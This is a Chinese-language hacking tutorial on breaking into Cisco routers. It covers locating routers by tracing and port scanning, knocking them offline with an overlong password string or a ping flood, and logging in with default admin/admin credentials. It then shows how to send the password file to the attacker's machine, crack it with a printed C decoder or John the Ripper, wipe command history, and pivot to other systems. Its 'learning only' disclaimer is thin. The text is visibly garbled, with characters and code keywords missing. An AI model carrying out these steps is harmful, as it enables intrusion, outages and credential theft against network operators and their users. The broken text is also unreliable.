不要用这破坏cisco系统
或非法访问系统
这篇文章只是以学习为目
只可以用在合法行为不能破坏任何系统这篇文章将
步步向你展示如何利用发现缺陷来获得非法访问如果你攻入了个cisco路由器或者扰乱了系统将会中断数百个网络客户机造成大量损失所以只可以在被允许情况下进行否则你将会有许多麻烦! ----------------------------------------------------------------------------------------------
目录:
----------------------------------------------------------------------------------------------
在你看的前需要了解
: -什么是IP地址?
-什么是ISP?
-什么是TCP/IP数据包?
-怎样隐藏你
IP地址? -怎样使用Telnet?
-怎样使用HyperTerminal?
-怎样使用Ping?
-怎样使用TraceRoute?
-怎样使用代理服务器?
----------------------------------------------------------------------------------------------
-第
段:为什么攻击cisco路由器? -第 2段:怎样找到
个cisco路由器? -第 3段:怎样闯入
个cisco路由器? -第 4段:怎样破解密码?
-第 5段:怎样使用
个cisco路由器? ----------------------------------------------------------------------------------------------
你看的前需要了解
知识: ----------------------------------------------------------------------------------------------
什么是IP地址?
IP是Internet Protocol
缩写,电脑通过IP地址来识别网络中其它电脑和其连接这就是你为什么会 在IRC中被踢走
并且找到你ISP和你大概位置IP地址是很容易得到基本上可以由以下几种思路方法 获得:
-你访问某网站WebSite,你
IP被记录 -在IRC中,某人得到你
IP地址 -在ICQ
OICQ中,可以简单得到你IP地址使用些小工具 -如果你
电脑和某人连接起来运行 systat即可看到和那些电脑连接(以IP地址显示) -某人发给你
封用java
写邮件可以得到你IP地址 还有其它许多思路方法得到IP地址
包括使用些木马和后门 -----------
什么是ISP?
ISP是Internet Service Provider
缩写,你通过它们连接到
ernet.你拨号后就会连接和其连接我 们可以运行
个traceroute(跟踪路径)来寻找我们ISP(traceroute 在后面还会介绍). 你应该看到像这样:
tracert 222.222.22.22
Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]<<<你
ISP 2 122ms 143ms 123ms isp.firewall [222.222.22.20]<你也可以 打开/关闭 "local echo"
如果你打开了"local echo"你电脑将显示你输入任何东西 并且连接上
电脑将显示回应 所以你将会看到就像这些:
你输入 "hello",你看到
是 hhelelollo
这是
返回信息和你输入内容已经混合起来了我这样做唯原因是看连接机器对我输入 是否产生回应
在默认
情况下telnet只会通过telnet端口连接即是断口23你并不会只通过端口23连接所以你连 接
时候你可以任意改变端口你可以改成25那是邮件服务端口也可以是21那是ftp端口 总共有上千个端口
所以你要选择正确端口! -----------------------------------------------------------------------------------------------
怎样使用超级终端?
超级终端可以让你
电脑任意端口进行监听某台电脑如果有信息来到这个端口就可以进行传输件超 级终端在 开始>
>附件>通讯 中没有话你可以通过控制面板中安装首先你要选择连接协议我 们选"TCP/IP Winsock"
接着输入要连接电脑下面选择端口可以选择Call>Wait for Call来等待 文件
这样其它电脑就可以通过某个端口连接上你了你也可以聊天或者传送文件了 :我
超级终端可能不样没有这个功能 ----------------------------------------------------------------------------------------------
怎样使用Ping?
Ping
使用很简单在MS-DOS方式下输入“ping IP地址”默认是ping 3次你也可以自己设定 "ping ip地址 -t"
可以使其不停
ping 改变 ping
大小可以这样做: "ping -l (size) ip.address"
ping其实是向远程
机器发送数据包远程机器接收到就会把数据包原路返回我们可以看到这个过程 时间
时间越短速度就越快当然拥挤时候就会发生数据包丢失 Ping 会减慢被ping电脑速 度
流量过大时候甚至使其down机分钟ping攻击就可以使台win98电脑崩溃(它连接 缓冲区溢出 - 连接过量
所以Windows决定休息休息了:>.ping攻击也会占用你许多带宽所以你带宽要 比目标机器大(除非目标机器运行
是Windows 98而且你有个不错猫那么分钟内你就可以叫它下台). Ping攻击对强壮
系统没有效果 注意: DOS's -t 选项不是
个ping攻击,它只是很小连接下而且中间有很多间隔在Unix或Linux 机器中你可以用上参数 -f 进行真正ping攻击其实如果你分布是POSIX-compliant (POSIX - Portable Operating
Interface based _disibledevent=>数据包在它头部有个值(在IP头部如果你不 知道这是什么意思
没关系你接着往下看就可以了)称作 TTL,它是Time To Live缩写当个数据包通过 路由器
时候它TTL值就会减少这样可能会使数据包在网络中流窜消耗带宽所以每当个数据包TTL 值达到0
时候它就会失效并且个ICMP
返回到发送者现在traceroute 先发送个TTL值为1 数据包
那么它很快就会返回查看ICMP头部traceroute就可以知道数据包第步通过哪接着就 会发送TTL值为2
数据包返回后就是第 2次通过地方依次下去直到最终目地就可以知道整个 路径
现在你是不是明白了呢? :-)
----------------------------------------------------------------------------------------------
怎样使用代理服务器?
在网上寻找
个代理服务器包括你需要打开端口代理服务器找到后你可以用telnet 或 hyperterminal通过代理服务器连接到另外
台电脑上这样做对方电脑就不可以确定你IP地址 -----------------------------------------------------------------------------------------------
第
段:为什么攻击cisco路由器? 你可能会想.. 为什么要攻击 cisco 路由器呢?
答案就是那样做将对闯入其它
系统非常有用... Cisco路由器非常
快在个系统中些会是以18 T1连接而且它们非常灵活尽管大多数运行 telnet
但是它们可以在DoS攻击或攻入其它系统时发挥作用 它们同时还会有成千
数据包通过但是可以被捕获进行译码...许多cisco路由器受托于系统它们 可以让你获得其网络中访问其它电脑
确切数量 -----------------------------------------------------------------------------------------------
第 2段:怎样找到
个cisco路由器? 寻找
个cisco路由器可以说是以项简单任务几乎所有ISP至少通过个cisco路由器最简单 思路方法是在dos下运行tracert
你可以跟踪到电脑的间许多电脑在这的间必有个 “cisco”这个 名字
如果你发现了记下它IP地址 :在中国未必有cisco这个名字
但是肯定有路由器你可以用SuperScan扫描前两个IP地址 看哪个开2001端口(Cisco路由器管理)和23端口即是
啦! 现在
你有cisco路由器位置了但是它可能还有个防火墙保护它所以你要检查下它是否被封 锁ping连接
次数如果有回应它就有可能未被封锁另外种思路方法就是试着访问cisco路由器些 端口
你用telnet即可端口23如果它要输入密码未叫输入用 户名
你就可能在个防火墙 试着找
个未受防火墙保护路由器这篇教程主题是路由器不是教你怎样通过防火墙当你确 信找到
个好系统你应该找个可以使用23端口代理服务器这样你IP地址就不会被路由器记 录下来了
:找到台运行Wingate机器即可 -----------------------------------------------------------------------------------------------
第 3段:怎样闯入
个cisco路由器? Cisco路由器运行 V4.1 版本
软件Software(现在普遍使用)这很容易干掉你只要通过代理服务器连接到 个cisco路由器输入串很长密码如: 10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
现在开始等
cisco系统将会重新启动可以说你已经攻击它使它离线了...但是过2-10分钟它就会 恢复
我们应该进入它 如果什么都没发生,那么它运行
不是脆弱软件Software,你可以多试几种DoS攻击比如大量 ping.到dos下 输入 "ping -l 56550 cisco.router.ip -t",这会起到同样
效果. :很有可能以上两种思路方法都不行
反正是要其down机那么试试那个攻击yahooudpFlood定 可以使其down机
定要注意小心啊!我相信你应该知道该如何保护自己 如果它被动结,就另找
个代理服务器进行连接并且用户名为"admin"密码为"admin"这是默认 当它暂时disabled它将恢复到默认状态 :你到我主页
会有篇文章包括几乎所有路由器默认用户名和密码 现在
你已经进入了你应该获得密码文件!系统运行区别软件Software但大部分有个像"htl-textil" 这类
提示现在输入"?"观看命你会看到有很多命令你会发现个传送命令用这个命令在当前Admin用户情况下把密码文件发送到你电脑23端口上但是在这的前你要把你超级终端设定好你发送文件的后超级终端将问你是否接收文件你选择是并保存在电脑中即可离线. 你通过了最难部分下面准备开始破解密码 -----------------------------------------------------------------------------------------------
第 4段:怎样破解密码?
现在
你获得了密码文件你要破解它才能继续进入路由器所以你可以运行John the Ripper的类软件Software破译它 这是我推荐
最简单思路方法.另种思路方法是试着把它解码这样做需要个解码软件Software使用某些解码软件Software你还要有足够耐心 这儿有
个专门为cisco路由器密码文件解码软件Software你可以在Linux中编译它: #
#
char xlat
= { 0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1
= "password 7 "; char pw_str2
= "enable-password 7 "; char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned
seed, i, val = 0; 
(strlen(enc_pw) & 1) 
(-1); seed = (enc_pw[0] - ?') * 10 + enc_pw[1] - ?'
(seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1])) (-1); for (i = 2 ; i <= strlen(enc_pw); i
) { (i !=2 && !(i & 1)) { dec_pw[i / 2 - 2] = val ^ xlat[seed
]; val = 0;
}
val *= 16;
(isdigit(enc_pw[i] = toupper(enc_pw[i]))) { val
enc_pw[i] - ?' continue;
}
(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') { val
enc_pw[i] - 'A' + 10; continue;
}
(strlen(enc_pw) != i) (-1); }
dec_pw[
i / 2] = 0; (0); }
usage
{
fpr
f(stdout, "Usage: %s -p \n", pname); fpr
f(stdout, " %s \n", pname); (0); }
(argc,argv) argc; char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned
i, pw_pos; pname = argv[0];
(argc > 1) {
(argc > 3) { usage
; exit(1);
}
(argv[1][0] 
'-') {
switch(argv[1][1]) {
'h': usage
; 
; 'p': (cdecrypt(argv[2], passwd)) { fpr
f(stderr, "Error.\n"); exit(1);
}
fpr
f(stdout, "password: %s\n", passwd); ; default:
fpr
f(stderr, "%s: unknow option.", pname); }
(0); }
((in = fopen(argv[1], "rt")) NULL) exit(1);
(argc > 2) ((out = fopen(argv[2], "wt")) NULL) exit(1);
}
while(1) {
for(i = 0; i < 256; i
) { ((line[i] = fgetc(in)) EOF) { (i) ; fclose(in);
fclose(out);
(0); }
(line[i] '\r') i--;
(line[i] '\n') ; }
pw_pos = 0;
line[i] = 0;
(!strncmp(line, pw_str1, strlen(pw_str1))) pw_pos = strlen(pw_str1);
(!strncmp(line, pw_str2, strlen(pw_str2))) pw_pos = strlen(pw_str2);
(!pw_pos) { fpr
f(stdout, "%s\n", line); continue;
}
(cdecrypt(&line[pw_pos], passwd)) { fpr
f(stderr, "Error.\n"); exit(1);
}
{ (pw_pos strlen(pw_str1)) fpr
f(out, "%s", pw_str1); fpr
f(out, "%s", pw_str2); fpr
f(out, "%s\n", passwd); }
}
}
如果你没有使用Linux
你就只好用John the Ripper的类软件Software带上密码档进行暴利破解 -----------------------------------------------------------------------------------------------
第 5段:怎样使用
个cisco路由器? 要使用它
你先必须连接到它你可以用代理以免你IP地址被记下当你进入时候如果你想关闭 历史记录来掩盖你
行为你只要输入"terminal history size 0"这样就不会被记下什么了! 输入 "?" 来看路由器中
命令大多数你都可以用 这些路由器
般都有telnet所以你可以通过telnet连接到其它系统上(比如unix boxes)并且攻击 它们
你还可以使用ping 和 traceroute 进行跟踪系统或进行DoS攻击你也可以监听数据包但我不推荐 这样做
并不是定成功而且会被发现.... -----------------------------------------------------------------------------------------------
如果你第
次没有攻入cisco不要担心...你两次是不可能成功它需要不断练习和超强耐力 这儿只向你将怎样做...
定要在合法情况下进行啊! 篇文章: 天网防火墙个人版如何防御网络攻击?篇文章: 系统风险和入侵检测
最新评论